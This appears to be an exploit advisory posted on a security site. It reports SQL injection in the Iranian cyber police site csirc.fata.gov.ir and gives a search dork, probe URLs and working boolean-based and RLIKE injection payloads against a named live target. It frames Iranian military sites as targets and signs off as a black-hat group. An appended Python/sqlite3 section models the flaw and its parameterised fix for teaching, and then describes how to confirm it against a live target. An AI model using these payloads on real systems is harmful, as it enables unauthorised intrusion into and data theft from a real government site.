Iranian Cyber Police "FATA.GOV.IR" has an SQL Injection vulnerability

2025.01.25
E1.Coders (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

This site belongs to the Iranian Cyber Police (Persian: پلیس فضای تولید و تبادل اطلاعات فراجا, the FARAJA Police for the Space of Production and Exchange of Information, FATA), which has an SQL injection vulnerability (CWE-89). We have repeatedly reported to this site that it has a security problem, and it has ignored our reports. We want to record this security issue.

#########################################################################################################################
# Exploit Title : Iranian Cyber Police has an SQL Injection vulnerability.
#                 "Vulners AI Score: 7.8. Confidence level: High."
# Author        : E1.Coders
# Contact       : E1.Coders [at] Mail [dot] RU
# Portal Link   : https://csirc.fata.gov.ir/
# Security Risk : Medium
# Description   : All targets: Iranian military websites
# Dork          : inurl:/page/news-details?id=   site:fata.gov.ir/page/news-details?id=
#########################################################################################################################
#
# Expl0iTs:
#
# address (refer url) : https://csirc.fata.gov.ir/page/news
# vulnerability       : GET SQL INJECTION, boolean-based, string
# action url          : https://csirc.fata.gov.ir/page/news-details?id=100014%22
# action url          : https://csirc.fata.gov.ir/page/news-details?id=%22100014
# action url          : https://csirc.fata.gov.ir/page/news-details?id=100014%27
# --------------------------------------------------
# vuln type     : SQL injection
# refer address : https://csirc.fata.gov.ir/page/news-details?id=100014
# request type  : COOKIE
# action url    : https://csirc.fata.gov.ir/page/news-details?id=100014
# parameter     : service_id
# description   : COOKIE SQL INJECTION, boolean-based, string
# POC           : https://csirc.fata.gov.ir/page/news-details?id=100014&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199
# ---------------------------------------
# vuln type     : SQL injection
# refer address : https://csirc.fata.gov.ir/page/news-details?id=100014
# request type  : GET
# action url    : https://gerdab.ir/fa/archive?sec_id=63&service_id=9
# parameter     : service_id
# description   : GET SQL INJECTION, boolean-based, integer
# POC           : https://csirc.fata.gov.ir/page/news-details?id=.&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end)
#########################################################################################################################
#                                        | Security Is JOCK |
#                                        | Russian Black Hat |
#########################################################################################################################
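Added example, not part of the advisory or of the target site's code: a minimal Python/sqlite3 model of a news-details lookup that shows why the `service_id` payload above works and what the fix looks like. The query shape `... service_id = ('...')` is an assumption, chosen because the URL-decoded POC `9') aNd 8634682=8634682 aNd ('6199')=('6199` only parses cleanly if it closes a quote and a parenthesis; the table, rows and the `news_id` value 100014 are constructed. The boolean-based blind check is the one a tester runs by hand: send a TRUE and a FALSE condition and compare the responses. On the concatenating handler they differ; on the parameterised handler both payloads are bound as a literal string and the responses are identical. The `id=100014%27` / `id=100014%22` probes are modelled as the stray-quote syntax error that usually gives the injection away. The `RLIKE (case when ... then 0x74657374696E70757476616C7565 else 0x28 end)` POC is MySQL-specific (the hex literals decode to `testinputvalue` and `(`, an invalid regular expression, so a false condition raises an error instead of matching) and is not modelled because SQLite has no RLIKE.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's news table; the
    real schema and contents are not known."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, service_id INTEGER, title TEXT)"
    )
    con.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(100014, 9, "Sample news item"), (100015, 9, "Second item"), (100016, 3, "Third item")],
    )
    return con


def vulnerable_lookup(con, news_id, service_id):
    """CWE-89: both request parameters are pasted into the SQL text.
    The ('...') shape is an assumption; it is what the advisory's payload
    9') aNd 8634682=8634682 aNd ('6199')=('6199  has to close."""
    sql = (
        "SELECT id, title FROM news WHERE id = ('%s') AND service_id = ('%s')"
        % (news_id, service_id)
    )
    return con.execute(sql).fetchall()


def safe_lookup(con, news_id, service_id):
    """Same query with bound parameters: the input is data, never SQL."""
    sql = "SELECT id, title FROM news WHERE id = ? AND service_id = ?"
    return con.execute(sql, (news_id, service_id)).fetchall()


# URL-decoded payloads: the first is the advisory's POC (condition true),
# the second is the same payload with the comparison made false.
TRUE_PAYLOAD = "9') aNd 8634682=8634682 aNd ('6199')=('6199"
FALSE_PAYLOAD = "9') aNd 8634682=8634683 aNd ('6199')=('6199"


def boolean_blind_differential(lookup, con, true_payload, false_payload):
    """Boolean-based blind test: inject a TRUE and a FALSE condition into
    service_id and compare the responses. A difference means the database
    evaluated the condition, i.e. the parameter is injectable."""
    return lookup(con, "100014", true_payload) != lookup(con, "100014", false_payload)


def quote_breaks_query(con, news_id):
    """Models the id=100014%27 / id=100014%22 probes: a stray quote that
    breaks the SQL syntax is the first hint of string concatenation."""
    try:
        vulnerable_lookup(con, news_id, "9")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("stray quote breaks query :", quote_breaks_query(db, "100014'"))
    print("vulnerable handler, TRUE :", vulnerable_lookup(db, "100014", TRUE_PAYLOAD))
    print("vulnerable handler, FALSE:", vulnerable_lookup(db, "100014", FALSE_PAYLOAD))
    print("injectable (vulnerable)  :",
          boolean_blind_differential(vulnerable_lookup, db, TRUE_PAYLOAD, FALSE_PAYLOAD))
    print("injectable (parameterised):",
          boolean_blind_differential(safe_lookup, db, TRUE_PAYLOAD, FALSE_PAYLOAD))
```

Against a live target the same comparison is done on HTTP responses (status, length, presence of the news title) rather than on result sets, and the probe should be repeated with a different pair of constants to rule out caching or a changing page. The remediation is the `safe_lookup` form: bind `id` and `service_id` as parameters, and, since both are numeric, reject anything that is not an integer before the query is built.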


Copyright 2025, cxsecurity.com